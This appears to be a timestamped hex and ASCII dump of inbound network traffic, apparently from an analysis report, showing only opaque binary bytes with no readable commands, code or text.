                                                                                                                                                                                    2023-01-05 07:58:37 UTC11890INData Raw: b6 35 33 a3 54 12 44 d5 f3 0b 82 18 44 7f 14 30 e2 37 65 0c b7 5d ec fb a8 e4 32 0d 63 61 fe e9 be c5 bf 6a c3 6e 13 cb 3d 98 a7 25 1f 66 6e a3 b1 45 a2 55 d6 1c 36 d9 cd 7b ca 3f 2b ad 1e 87 2d b5 85 f5 12 df ea 81 78 b7 0d 6d 89 dc 3d 73 c1 ec a5 4c a7 e5 ce a1 29 f5 f6 08 06 07 30 cd 39 86 f3 58 12 4a f1 71 e1 5f 59 5e 9b fb cd ed a3 81 84 45 27 d6 72 78 22 63 52 58 13 75 6c 59 a2 34 13 45 0c 97 70 a9 b3 f8 0f 4d 21 ab b5 e4 43 20 d3 ff fa f0 26 b0 f4 41 77 10 a3 90 bb 06 15 45 48 2b 96 9a 47 de 47 2e da 90 9d 62 fc 09 43 17 5a 66 99 29 ba 2e 3e 39 0a 73 31 bf fe 5a 60 b5 00 38 91 bb af 5b c8 29 a3 8c c3 92 e4 8d 96 b0 76 94 bd 56 d4 c5 9b 00 66 0c 8c 90 0e f2 8e 89 ba 25 7a 6d 6f 0b 26 e8 e9 c5 a6 a1 ba 59 5b 2a 1c 8b be 33 c8 68 26 f4 40 58 f6 db a6
                                                                                                                                                                                    Data Ascii: 53TDD07e]2cajn=%fnEU6{?+-xm=sL)09XJq_Y^E'rx"cRXulY4EpM!C &AwEH+GG.bCZf).>9s1Z`8[)vVf%zmo&Y[*3h&@X
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11906INData Raw: 06 ea 62 36 de db 9d 6e da 42 61 09 9c ce 0b 6b 75 6f 3f 07 17 6d 11 76 11 ae 0c b0 45 f4 bd 7f 19 95 ac a5 75 81 d6 dd e7 37 ac 08 2f ec a3 e7 0f fd 35 09 96 72 72 51 64 91 41 8c 9d 22 36 0a f4 a2 a8 b6 12 83 bf c5 c9 a9 c5 a8 6a ed 29 ec 40 c4 4e 98 69 bd 54 ad 0c 86 4c b8 ea 2c 00 ef 25 f4 14 13 aa e2 68 b9 4b 1f e1 3c 87 94 97 b8 31 67 4f b7 44 fa ac 6a 24 c6 2f 34 0b b0 60 39 f2 b9 1a 04 86 4c cc 08 d0 ea f3 74 8c 5e 2f 13 24 5b 40 07 b2 34 56 5c e2 c3 26 0f ce 24 b7 df ca 3e c6 e2 90 68 26 fd da 9a 43 57 18 84 3e cc bc f0 62 9c 06 43 be 7b b2 0e e5 4f 2e e6 43 7a 68 6f 1a b3 d2 fb 87 a7 88 eb 4d b4 a2 e4 39 05 11 ec 11 3e e6 9e 05 f0 24 69 a4 d2 b8 b7 c1 68 10 85 7b 9b 6f bc 95 30 73 82 e2 6e c2 00 98 46 d9 a9 48 a4 65 fd a6 64 4f 64 6c af 97 85 d2
                                                                                                                                                                                    Data Ascii: b6nBakuo?mvEu7/5rrQdA"6j)@NiTL,%hK<1gODj$/4`9Lt^/$[@4V\&$>h&CW>bC{O.CzhoM9>$ih{o0snFHedOdl
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11922INData Raw: 98 ff f8 94 8a 15 c8 3c 0f 0e 03 f1 70 bf d2 6b d7 17 b8 09 b5 82 33 01 8c 31 4b fa 5c 6b 04 81 2f 4a 72 8d 1f 0f 31 59 43 5a a0 7a 12 86 c7 67 00 27 68 9d 2d a3 e2 f1 58 5e 79 6d 94 aa 04 db bc 56 00 55 aa a0 0b f1 e2 9c 9d 24 46 f2 39 69 2f 1e 7d 69 9c 2f 1c 8e c4 c5 61 c1 db fd a1 45 67 01 e7 02 1c 03 f5 da 53 4c 36 18 0b c3 5d bb 24 44 6d 82 a9 cf 32 7b 32 8e b1 ce 1e e5 d6 82 27 24 b4 94 4b b8 a4 b5 45 39 bb 2e 1b 3b 6f c8 6c 19 e0 5f ec aa 90 16 7e 60 30 17 13 8f 1f 36 55 ed 11 ca 47 aa fb b4 b5 85 82 76 4a 90 5e 22 74 c4 a2 d5 c9 af 65 45 20 8e 51 98 7d 68 1d 94 98 b0 2e 6f 01 fd 4b 49 ba 29 dd 76 a7 9f 51 23 c3 5b 8d c5 1e de 90 6e f8 79 c8 c1 15 23 c1 55 88 b4 a0 c9 fc e0 55 06 5f 78 7c 17 8b ab 4b 63 dd 3a fd 99 12 29 5a e1 a0 34 14 7c 6c 4b 8e
                                                                                                                                                                                    Data Ascii: <pk31K\k/Jr1YCZzg'h-X^ymVU$F9i/}i/aEgSL6]$Dm2{2'$KE9.;ol_~`06UGvJ^"teE Q}h.oKI)vQ#[ny#UU_x|Kc:)Z4|lK
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11938INData Raw: 5d c1 67 d5 e7 ba 3a 0c 16 7a e2 76 56 ed 6b af 82 1d cc 56 11 13 b7 53 ec 96 49 ee 2d a6 03 31 75 5f 45 fe 04 20 85 83 b8 db 55 8a 3c 29 6b 8a 6c 09 9d e2 ff 9a 47 86 a1 0d 0e 45 2d 48 e0 69 a9 00 25 10 ac 2b fb f6 df 82 68 77 38 c4 1b db 61 c8 f1 9d 84 4b 1f 18 77 2b 52 2c 62 5b 2f 0b 33 16 8f a7 3f 31 d6 3b 9f 64 7d 2c f9 0f ff 6e 83 f7 69 5f 07 3a e0 df d9 fc ce 9f 27 19 ff f8 61 38 62 7d 3a c4 32 1a 10 5c 58 2a 06 2e 77 61 01 6a 24 ac 77 98 e1 e3 30 b3 7f e9 f9 63 b8 74 49 38 65 54 8d d6 87 e1 95 73 ee c9 f2 6e ba d1 a9 2a 4d c9 24 44 fa e2 49 95 82 01 75 7f ea 06 d0 62 64 20 07 87 b4 6b 75 fc 1b 05 4b 73 e0 25 6f c5 76 cd a6 22 87 b8 96 6a ba 94 5c c1 01 15 6c 8a 2c 33 ad 23 f8 7c 9b 1a 4d f3 d9 80 e9 f4 cc b1 1d dc 42 8c 07 76 5b 0a 83 38 69 34 9a
                                                                                                                                                                                    Data Ascii: ]g:zvVkVSI-1u_E U<)klGE-Hi%+hw8aKw+R,b[/3?1;d},ni_:'a8b}:2\X*.waj$w0ctI8eTsn*M$DIubd kuKs%ov"j\l,3#|MBv[8i4
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11954INData Raw: f1 63 84 4b cd 61 10 64 e8 77 e0 03 ec 25 ce 66 97 b3 33 94 f6 9f 05 a4 e3 c2 0d 9c 4f ae d2 d1 7e 1e 35 bc 7f 1b 48 cd 6f 5d 1e 26 ff 17 24 d0 c8 c6 34 b0 a6 80 4a a7 e9 21 67 ec 66 ed d9 7a 72 33 22 6e 5e 38 55 c9 e1 6f 2d dc b0 95 5e 56 f0 5e 25 e8 e0 59 d2 fd 5d e4 70 cd f9 a5 32 3f 7c 9d f0 30 f3 5e a9 96 f8 23 25 e3 94 82 0a 0b 97 79 14 0b e8 75 6a 12 32 7e 5a f7 1b 4b 4c 1a ac 3c d3 10 d9 86 75 42 99 f3 12 8b 57 e7 be 45 d2 66 28 ef 72 8d c4 c7 5c 62 d3 a8 92 70 60 80 27 cf d2 2a 58 84 25 35 b4 f5 55 93 4c 50 51 19 dd c2 b8 c8 7e 8b f5 77 07 dc 66 e0 74 7e 48 76 73 7a ee 76 ac 38 0f fd 20 4f 99 bc 7e af 33 4a 87 3b 91 92 cc 2b 07 43 e6 51 a7 2a 15 ef 69 47 76 3e 1b 03 b9 8b 14 e5 e5 13 c8 a0 53 a7 8b 18 aa 92 a7 1f c7 f1 e0 50 63 85 4b 5e d4 de 91
                                                                                                                                                                                    Data Ascii: cKadw%f3O~5Ho]&$4J!gfzr3"n^8Uo-^V^%Y]p2?|0^#%yuj2~ZKL<uBWEf(r\bp`'*X%5ULPQ~wft~Hvszv8 O~3J;+CQ*iGv>SPcK^
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11970INData Raw: a9 4c c7 7a 14 9e cf 92 68 46 d9 b4 72 42 52 8c 48 c5 a8 72 b0 88 92 f2 a6 3e 0c b1 00 04 e1 a0 d7 2c e3 c1 31 08 61 09 23 8f 77 96 34 bc 98 12 6e 36 5a bd 77 f3 88 60 27 8e 02 92 fe fd 60 61 d2 b2 43 eb 23 ca 6e 70 95 de 56 46 4b df eb 54 3d 7b 78 20 e3 84 f3 4b 3a 91 39 ec a8 bd 58 c2 3e 9d e2 5d 7a 86 7c 74 02 4b f8 7c b6 1a d2 6c 23 33 55 5e e3 ed 6f e1 ce ba f2 1c 05 96 b3 70 0c a9 43 09 c1 94 2e 8c 87 09 96 e7 aa 76 d4 ea 01 27 33 a1 39 09 7e 1c 48 75 d2 35 37 6c af 1b 07 d6 15 ef 92 5f 20 16 eb c5 be bf 4f 4a 22 4d 5f 8a 09 71 02 a1 c9 68 f7 78 47 cb 4a 90 19 0a 67 c2 6c b3 91 2e 18 1c e7 75 97 12 7f ce 3b 41 fb c9 2a 81 e5 8c fd fc bc e0 8f 58 da bb 36 a7 fb 94 fb 23 f0 14 e4 c6 93 70 4e 1f 05 db e5 d2 ad 45 ed c9 6b 22 41 9c 8b 49 25 ac 42 a1 32
                                                                                                                                                                                    Data Ascii: LzhFrBRHr>,1a#w4n6Zw`'`aC#npVFKT={x K:9X>]z|tK|l#3U^opC.v'39~Hu57l_ OJ"M_qhxGJgl.u;A*X6#pNEk"AI%B2
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11986INData Raw: e1 ba 7e e6 c6 34 30 d3 cf 49 1a 41 60 7d 8b f0 89 f2 49 1c 0e 03 75 18 9f a2 24 99 2b c7 00 68 54 e8 5a 41 ab b3 20 b0 86 e0 9e 09 16 63 89 69 cd 5e 92 45 12 a5 8e e8 96 41 45 c5 cd 39 3a e9 68 00 ae 6e 46 b9 b1 77 e1 b5 a8 a9 12 12 f0 57 70 69 ca 83 17 b7 da af 10 94 3c af 09 a7 20 00 ff f9 e8 ca c9 c4 5e 37 04 62 ee ff 17 fb ef 01 da 8a db 1e 45 b8 9d 25 26 4a ba c4 4b 59 e8 8a 97 56 90 ef 58 c8 65 7b 32 d9 48 ef 8a ef ea 27 b4 1b 69 08 30 7d 49 cf 01 6f e5 a6 c0 3c c9 58 25 ee 80 b2 9b 69 d5 c5 67 82 f4 cb 2f d1 a8 30 2b b4 0e 86 fd 30 62 c9 bd 7e ed 84 d4 bf a7 8b d2 70 c5 4e 42 fa 73 b8 49 86 9a 0e 8f 19 32 f7 b3 d9 27 1c b3 19 7b 99 82 5b e1 43 7c 65 44 03 a8 b8 fd 7e 41 9f 81 da ae dd 37 15 66 20 cc 5b 0d 6f 5f cb 7d 4f 48 ed 6f 24 b8 1c 2d f5 c6
                                                                                                                                                                                    Data Ascii: ~40IA`}Iu$+hTZA ci^EAE9:hnFwWpi< ^7bE%&JKYVXe{2H'i0}Io<X%ig/0+0b~pNBsI2'{[C|eD~A7f [o_}OHo$-
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12002INData Raw: 9f 44 42 00 98 b4 e8 c8 c9 a3 52 58 6f a5 ac 5c 7e 65 d4 ad 2c c7 8d 44 79 ca 3c b3 da dc 74 37 6c eb 72 77 4e 38 ad 0a f0 c7 6c 4c 1e 38 37 2a d7 3a 10 c7 ae 18 57 de c5 1e 2c 71 54 f4 be d5 17 7a 7b ad ca fc eb ac c9 e5 b5 5a 67 ac 52 a0 4b 00 a7 83 b2 1b 23 a4 c5 d9 09 fd 36 65 cb 37 86 f6 9e fb b6 1d 34 62 16 73 9f 4f 82 d9 fc 25 2a 57 ad 37 a5 91 42 03 6f b2 1b 8d ee ae 8a 0b 0e 4b 76 97 e3 7f bf 73 57 cf ae bc 08 97 2f f1 ed 44 21 c4 32 b1 97 d1 59 34 28 46 52 08 d8 a1 02 fa 02 f0 c0 9c d9 4a e3 45 d0 6b e8 76 39 ba 97 cd 66 e3 43 ba ac 98 d9 b0 6b 9e 15 dc 6a f9 08 2e 05 6a 63 39 38 9c f2 2a 4e 52 9c a1 11 eb 47 1a 29 f2 b1 5d 05 0f ea 6c 76 49 bc 14 ec a5 8a 4a e9 db 3a 6d 80 75 bc f7 67 f3 72 4f 39 c3 26 35 12 98 ed a4 f9 98 66 ba 86 27 b0 77 48
                                                                                                                                                                                    Data Ascii: DBRXo\~e,Dy<t7lrwN8lL87*:W,qTz{ZgRK#6e74bsO%*W7BoKvsW/D!2Y4(FRJEkv9fCkj.jc98*NRG)]lvIJ:mugrO9&5f'wH
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12018INData Raw: 9d 66 7c 07 c6 b8 b5 7c 54 bf bd 67 01 aa 32 5e d7 b7 a8 5c 31 2a 82 98 72 f2 15 88 2b 31 47 b7 99 41 9d b1 0f 02 08 dd 7a c8 5d 92 39 cd 7f ae 32 f2 93 15 eb 82 e2 3e ff 5e 2b f6 d0 95 4a bc 47 9c ce fa 5a 04 3e 1b 99 45 7b 27 8e 07 64 c4 27 bf 18 7b 54 80 ff 5f 96 58 5e 27 4d 3f 02 e3 aa ad bd b2 ea 64 7f 8d 67 02 96 87 6e bb 79 cb 14 d3 8a 03 af 9e a6 56 e2 a8 61 e1 e2 a0 b7 3c fb 86 56 03 24 cd cd f0 42 68 91 9c 75 71 3a 4c 1d ec 93 48 50 8d fa ad 9e af 75 85 b7 23 55 1b f2 2e d7 52 66 c1 20 2a 58 f5 82 7f ef ed d8 2f e7 93 d8 70 11 0c d2 c7 5e 7b 82 63 ac 71 c3 83 1c 7c a1 20 9d 82 36 f0 5c 11 5b 63 e6 c7 f8 6e e5 70 2d b7 6a 9d d9 bc e6 28 e2 cb 7f 8b 05 99 4b c5 38 a9 d6 4a 4e f1 5b 5f 6b 94 aa d9 94 2c 04 aa 7f 6e 2b 02 d3 7a 19 5b b2 81 ad 7e d3
                                                                                                                                                                                    Data Ascii: f||Tg2^\1*r+1GAz]92>^+JGZ>E{'d'{T_X^'M?dgnyVa<V$Bhuq:LHPu#U.Rf *X/p^{cq| 6\[cnp-j(K8JN[_k,n+z[~
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12034INData Raw: 30 36 6f aa 99 64 63 ee 18 22 ed ca ab b7 1a e1 61 a5 d2 9b 21 82 bc e0 6f 57 0a ab 97 7e 72 2a 17 bb 97 ab 91 33 fb 15 60 50 bc 1b 29 dd 97 04 48 56 3a df 15 2d c7 b7 cb 4d 14 e2 6d ec d8 25 a5 f9 eb d0 53 85 6b da 27 1e ec 2f 42 8c 27 88 6c 2b 5f fb a8 3b ef b9 f8 60 34 9d d2 36 49 ee e3 e4 44 c1 3c b6 cc 6d 22 26 91 67 03 07 75 5f bb fc 58 c7 63 1a 62 f2 0b 23 15 5e 25 53 bd 0f 43 73 07 12 9a 68 3e 75 09 fa 0e 64 81 18 0c 54 b0 20 de ca 2d 77 07 63 bb 5a ed 46 02 0e fd 9f 75 f9 b5 95 c3 56 52 35 c9 96 31 ce 32 f6 a0 98 db ce ba 2e 62 eb 50 68 a6 7b bd f8 90 54 c7 37 ae ea 12 b2 14 ee e0 e5 c5 13 b0 a8 f1 27 fd 8d 49 cf c4 81 76 70 0d 1f 65 d2 73 d5 73 05 37 28 bf 77 16 93 b2 cb ad 60 de d9 d1 be de ca 42 f2 6d e9 0c d0 3b 92 49 42 79 29 64 f5 14 c0 14
                                                                                                                                                                                    Data Ascii: 06odc"a!oW~r*3`P)HV:-Mm%Sk'/B'l+_;`46ID<m"&gu_Xcb#^%SCsh>udT -wcZFuVR512.bPh{T7'Ivpess7(w`Bm;IBy)d
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12050INData Raw: 37 8c ba 5b 64 3e 94 a9 3b 28 b0 e6 d7 19 ab 26 42 51 f1 db 4c 75 b6 35 80 88 e9 8e b3 4c 70 ce 6b af 7b f0 7d 5a 65 32 2e bc 03 ae bf 3f 60 6b 3e c7 84 ed 7a eb 9d e2 e5 ac 53 87 16 f1 7a 4f 83 26 32 78 78 d3 a8 42 84 ee 53 01 73 c1 bc 6a 57 9f 4b 2d be da 05 6e cf 78 f5 ee 9d 0c 33 81 db 40 8d 8c 86 b5 fe 85 7e 75 55 c0 ae 80 32 fd 7a dd 11 48 e6 e7 63 f7 05 f8 8f e3 40 54 02 5b b6 00 88 ad fd bd 28 f3 87 8d 2c 7d 77 17 32 89 2e a3 82 82 50 f8 e2 7b d7 71 8d 44 4f ed 36 53 c2 b5 34 f1 3f 80 90 9a 1f c2 fb 42 bd 9f 93 99 9f bf 11 a7 e1 7c fe 11 36 0d f5 39 c1 1e 5a 4e 53 a3 40 2f d6 0b 12 ad ba e2 f1 6d 5c 29 fd ad 0b 2c 2e d9 55 1c 79 43 af 82 f9 d9 80 2c 02 1f 40 70 a7 89 47 40 9c 75 b4 46 6c 9b b4 0b c1 d1 22 3b cc cc 60 9e 5a b4 dc 00 63 9d 7b 22 b3
                                                                                                                                                                                    Data Ascii: 7[d>;(&BQLu5Lpk{}Ze2.?`k>zSzO&2xxBSsjWK-nx3@~uU2zHc@T[(,}w2.P{qDO6S4?B|69ZNS@/m\),.UyC,@pG@uFl";`Zc{"
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12066INData Raw: 37 aa 73 50 40 da 73 59 7b fe c2 b9 cb 7c 8b 14 79 25 04 2a 13 8d fc 44 69 19 6a 2b 1f 1c b2 4b 5a 05 18 7f 32 6a 69 48 a5 e7 e3 fa 1b e9 b3 6a
                                                                                                                                                                                    Data Ascii: 7sP@sY{|y%*Dij+KZ2jiHj
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12066INData Raw: a1 d6 78 a9 83 26 63 13 28 d8 82 bf 3a c5 8a e7 e2 79 23 5f b1 b2 04 b3 e3 3b ee f2 28 ad b5 fe 26 48 b6 70 ad cb c6 62 34 e6 66 2a 2f c3 bb 48 0e c2 e1 d3 56 12 e0 4f 02 aa 0a e6 43 09 bb ce d8 43 f5 09 56 ca f2 63 dd 01 78 ab b1 ab 36 4b 9b 5a b4 a5 6d 02 ee 15 4a 5a 38 a5 f7 8a 56 9a 2e 42 be d6 ea a2 3a 82 bc 36 8d 11 ab 86 40 92 25 00 7f e6 c8 59 ee 4b fe 9a 8e d7 67 30 92 4c e6 8e 8d 47 81 55 89 18 79 65 30 3e 84 03 9d a4 1d 22 3a 96 7b 95 cc 73 27 1a 3a 43 29 8c c8 e6 d6 e7 cc 5c d9 cc 3a bc d8 cb 83 76 72 41 32 25 f4 df 1f 67 38 8a 55 2a 60 fe a1 f9 1b 33 81 eb e2 e4 ed 2d 4c 14 3a 10 fb 73 4c e3 09 33 b4 e2 43 4b 43 4e 7e 68 78 99 7e 94 67 75 85 e8 3e d7 a9 3a a9 46 46 30 d5 7a 36 58 2c b0 6f d2 84 b3 36 76 20 26 ca 43 46 ba 4f 5b 8f fd 2f c2 3a
                                                                                                                                                                                    Data Ascii: x&c(:y#_;(&Hpb4f*/HVOCCVcx6KZmJZ8V.B:6@%YKg0LGUye0>":{s':C)\:vrA2%g8U*`3-L:sL3CKCN~hx~gu>:FF0z6X,o6v &CFO[/:
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12082INData Raw: 88 de 5a b0 d0 5e da 1f b7 ef 35 ab 8d a7 04 a4 c7 2d fe 9c 30 b4 ef 9b b2 54 3b 1c f9 60 14 33 e1 55 29 9a f3 62 62 94 c7 40 0e bd 79 46 d0 89 af 6f ef 57 23 22 b0 32 76 be 1b 80 dd 3e 03 f0 fa 92 30 0c 6e d7 86 7d 0d bb bc ac 5d bf a3 1f 9f 82 9f 95 34 ba 96 30 61 52 ef c7 3b 0d 06 70 51 f3 48 b4 76 9d 3c 07 3e ad 57 f8 e7 e3 97 db 2d 2e 5c 16 f0 ef 8c 09 98 f4 6c fb 49 f7 0b a8 f5 cf 41 e0 37 d1 90 b9 74 7f 0c b2 9e cd 13 65 f8 d7 b8 cf 4e 8e f1 98 e5 97 de 19 86 f3 54 46 79 0b a0 82 f7 2a f5 6e 88 ab 38 c3 5b 5f 87 2b 63 1b 10 12 10 1d 1f 87 03 07 02 3d 69 27 0f 7d 7c f8 a4 28 47 69 d5 a6 76 b3 dc b5 9e a0 87 b1 89 e2 04 a6 9b 28 52 2a 8d de d1 89 df d0 3a b7 a0 ad 10 b5 28 f3 ab 1e aa dc 91 04 1d 21 30 2c 7e 52 d8 d3 c2 fb 47 ec 56 6e 43 92 45 97 90
                                                                                                                                                                                    Data Ascii: Z^5-0T;`3U)bb@yFoW#"2v>0n}]40aR;pQHv<>W-.\lIA7teNTFy*n8[_+c=i'}|(Giv(R*:(!0,~RGVnCE
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12098INData Raw: 02 59 92 be c2 9a b0 b3 e9 79 5e f4 f8 c5 04 29 70 69 3f 48 8c cd 72 db ef 17 42 98 52 9a d3 00 50 36 23 7e 4f 98 d0 46 43 3d b0 07 7d d3 39 96 2c 75 f3 f9 ac 20 0f fd 91 aa 1b 6e f8 6f 9b 66 a7 85 34 1c 7a 3e e6 e8 a4 ac d9 6c d8 ad f1 a8 17 ce 06 c8 32 d5 93 3e 42 8e b6 a4 f7 63 77 43 a0 07 a2 7b 26 0d 96 27 da 87 71 8c aa 44 c6 44 b8 5e c9 e2 8e 2e c1 17 b7 61 42 ef 32 01 42 26 9e 00 7d 58 92 51 ef 9a 4e 52 27 06 ed 9f 76 0b b5 86 ac f9 db 53 d4 cf 7e 8b be 1e da 5b 3a b7 54 8e ed 76 ce 36 09 7d 70 65 a9 2e a6 81 2a 39 83 cb 54 3c e5 d6 58 fc 9b 91 e1 e2 78 e2 6b dc b9 92 02 c9 3b 35 95 da 3e 62 e3 07 1d eb 21 60 b1 4a de a6 81 ad 13 b3 55 02 2c 5d 79 ac ed 02 95 68 24 e9 72 c3 d2 32 2b 4a d2 18 19 da 35 35 40 5a 6f 17 0e 17 ed 39 e6 03 21 4e 61 c7 bc
                                                                                                                                                                                    Data Ascii: Yy^)pi?HrBRP6#~OFC=}9,u nof4z>l2>BcwC{&'qDD^.aB2B&}XQNR'vS~[:Tv6}pe.*9T<Xxk;5>b!`JU,]yh$r2+J55@Zo9!Na
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12114INData Raw: c6 ec 7f 81 5f 1d 53 18 64 e2 11 f5 e0 c7 84 96 d1 fd 0c 1b c1 2c 9f 12 e2 38 8d 71 5f d5 c0 4b 44 84 77 a2 03 92 0d 14 ce 21 09 87 94 b2 d3 bd 41 91 a6 ee e2 7a c9 f8 e7 49 d7 03 00 7d 11 d6 0c 97 4b 13 31 b6 3f 81 91 35 d7 a9 07 da cb 6b 75 b0 61 98 dc e5 59 2d aa b5 3f db bc 23 e6 36 95 24 38 f7 4c 11 57 8f 63 f5 c5 81 26 13 fd 9b 2e 5c ba 7a 14 65 d4 60 2d 39 54 65 d6 61 6a 8e 5b 6a a8 ab bb bc 13 39 52 c6 2b a5 5e 07 37 ad e1 61 23 ee 3f b0 28 ee 13 9e 99 e9 d7 fe a0 5e cb a1 68 68 51 a5 6e 87 1f 3b eb dc 41 80 fa 5b 0a 45 fe 6b f2 88 fb 85 91 a7 77 f9 d0 4e c8 b3 2b b4 e5 2c 3d 61 d8 09 d0 de cd 4f d5 93 7d e6 1f 7c cb 02 8e a8 0b 47 c1 58 e7 17 6a 0b 9e 3c 21 91 8b 34 00 d7 2d 1d d9 e1 29 f9 f8 80 62 be 74 82 09 08 2a ae ff 55 fe a0 3a cf f6 95 03
                                                                                                                                                                                    Data Ascii: _Sd,8q_KDw!AzI}K1?5kuaY-?#6$8LWc&.\ze`-9Teaj[j9R+^7a#?(^hhQn;A[EkwN+,=aO}|GXj<!4-)bt*U:
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12130INData Raw: ac 44 56 30 4f c0 9d cd 4b 40 ea f8 52 f9 ee c5 3f 4b 47 66 4d 68 73 7f 99 c7 de 4b 79 6e c7 34 59 0e 54 4e 2f fd d5 4a e2 aa ff cf 34 9d 98 60 c6 73 89 9c 30 09 72 78 8c 8b b8 1d bb 23 79 c2 72 37 1e de 22 06 de 09 e3 56 78 ee 7a 06 9c 24 ba 2c 7e 5d a9 6c 29 ab 70 0a 3e 4a 5f 11 c8 17 3f c4 d5 c9 52 31 ff ff 08 61 1f e8 05 1a 48 9a a6 9a 92 d5 ed ce 19 f2 0e 5f ab 84 3a 5e d7 de 99 1f d0 0d 95 16 d5 12 23 ed 1f 5c cd 06 f9 30 6f df 55 81 24 a6 79 21 85 18 e9 b4 87 9e 9b ee 31 61 d1 2b 61 66 cb 97 0d be cb 60 cb 31 1b d1 e0 0d 37 ec bf bb 6b 3f 6e 13 2c cc de ff 08 cb 14 c1 29 3b c6 ae e3 5e 21 a5 14 12 45 d5 0c 98 39 cb d0 5f ad f5 b8 2a 7d 8b 10 85 cf 47 6d 59 9d b1 1e c4 d1 a3 0a 52 3e f7 b8 a6 a8 45 ed 9e fa 86 15 09 00 7e 3e c1 b9 5c 7c 2d b4 8a cd
                                                                                                                                                                                    Data Ascii: DV0OK@R?KGfMhsKyn4YTN/J4`s0rx#yr7"Vxz$,~]l)p>J_?R1aH_:^#\0oU$y!1a+af`17k?n,);^!E9_*}GmYR>E~>\|-
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12146INData Raw: 4a 3c 84 9e 11 63 46 bf ab 5e 31 22 cf 81 8c f6 db 6f 01 41 27 04 59 78 7c b6 49 e2 a5 cc f7 ec 10 66 85 12 11 02 90 13 a1 d9 81 f4 a8 b3 d3 13 57 93 82 e9 b3 49 73 db 06 c1 b6 0e 66 a8 06 14 33 1f db 57 f8 be e5 44 e9 8a 3b f8 b8 2c ac c7 76 4a dd 18 ea 73 00 ba c7 41 67 e5 76 93 e1 f4 00 89 36 d0 84 af 05 d7 ce e2 0c 05 5a 1e 5e 12 6f ff aa 75 6d ca c2 c8 a6 37 99 7d 9b 31 fb 8b f9 ad c4 4c af 0d ca 19 e3 7a 01 55 cc 71 ae a2 17 d0 ea 09 69 f2 eb 21 af 79 ae 38 ae 46 3c 13 61 94 3c 7a 08 25 1f 53 66 96 5f d5 44 6d 22 9e 7c 9c 06 36 61 b7 3d 5b 69 f3 2f ca 56 5c 29 3c 4b c9 06 b9 24 a7 c4 76 aa 88 f8 0d 88 54 ee ac ff 63 1a 78 90 fa 3e ee 3b 3b 34 6f f5 92 02 16 b3 1e ed 6c 6a 8b 00 eb f9 7f 5c 5d 4c 1f 00 64 63 7a bf 22 6d 72 56 5b 07 7b 75 73 0a 75 71
                                                                                                                                                                                    Data Ascii: J<cF^1"oA'Yx|IfWIsf3WD;,vJsAgv6Z^oum7}1LzUqi!y8F<a<z%Sf_Dm"|6a=[i/V\)<K$vTcx>;;4olj\]Ldcz"mrV[{usuq
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12162INData Raw: 11 57 24 0b f6 f6 e9 47 93 0a bb 89 c4 6a d6 63 7a 00 cf db 80 9f 05 cf 44 04 b9 27 64 55 30 33 aa d7 59 be 57 d4 08 87 df ca b6 48 43 b8 17 5e ef 2b 40 5e 32 1c fd d5 16 72 4f ab 69 0e 08 6e 55 57 c9 13 34 a2 90 db d3 fa c2 b8 69 5d b0 57 7d 81 d5 2e b2 cd c7 e9 dc 29 18 05 7d 49 ab d6 80 c4 72 86 d8 9e 55 1b ac 90 b2 45 e5 d2 ad 11 cd 7a 93 2a 2f 6a 7b ed b4 a8 e4 65 e4 24 78 4e e2 90 78 72 c2 70 d6 bb 8e c4 17 2f f1 ab dd 10 1e a7 1e a4 b0 57 7f 4e 16 c4 d4 96 11 7c 34 62 e6 41 8e ea 61 d8 28 c7 32 ed 8e c9 4f 69 7e 12 82 6f 69 07 6d bf db ea 6f 5c 43 69 20 68 53 4f d0 a5 29 36 9b 7d 6a 7d 7a 2d 49 7c 0c 07 82 4a 12 62 be e5 06 29 ad c5 fe e4 77 d6 5f 17 e0 7d 0a 51 71 ff cc ea cc f4 4b 6b db e3 e2 17 64 e7 c0 93 fa 4e 1d 13 f0 c1 96 c1 4d 26 f6 47 c2
                                                                                                                                                                                    Data Ascii: W$GjczD'dU03YWHC^+@^2rOinUW4i]W}.)}IrUEz*/j{e$xNxrp/WN|4bAa(2Oi~oimo\Ci hSO)6}j}z-I|Jb)w_}QqKkdNM&G
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12178INData Raw: 57 50 f9 d0 c9 65 96 f2 ea c6 43 a7 3a 9d 90 f4 85 21 18 e1 2a 54 ec 48 a9 61 32 e7 ca f5 73 0d 82 20 ff 44 5e 4c c3 6d 39 1b e2 ea 92 97 ba fc 6b 3d 1d a4 b7 85 54 cd 78 bf 68 c2 d3 98 9e 3e 93 dc 71 fd 2a 6a 54 8f c8 b9 8d a0 13 5c 3b 6a a7 e5 77 70 20 7d fe ad bd e0 8a b9 a0 0d 1c 46 c3 3e 3d 63 fc aa b8 30 ee 31 4c 0f 2e b7 54 a5 b8 a8 f1 5e dc ff 99 fc d9 e2 05 47 ee de 21 ea 45 14 db ca d7 b0 42 36 f8 e8 79 3e 3f 49 7c 38 9a ab d5 82 e3 96 59 1c c9 6a cb f5 10 aa 61 b9 0b 51 3b 08 7d 36 be d0 3b d8 93 73 8f 78 fe 29 05 8b 19 56 c5 69 d3 c2 ab bd 57 29 d0 71 d5 04 c3 3f dc f1 6f cc f5 e6 1a 03 b5 fc 41 74 15 48 77 f5 49 d5 1d 08 6d 47 58 e7 a2 2d 3d 5b f9 1c df 05 c3 2a 43 41 1f a7 a1 74 58 19 2f ea 8b c5 de 35 12 8f b9 b0 fe 42 7d 70 9d 50 37 64 9d
                                                                                                                                                                                    Data Ascii: WPeC:!*THa2s D^Lm9k=Txh>q*jT\;jwp }F>=c01L.T^G!EB6y>?I|8YjaQ;}6;sx)ViW)q?oAtHwImGX-=[*CAtX/5B}pP7d
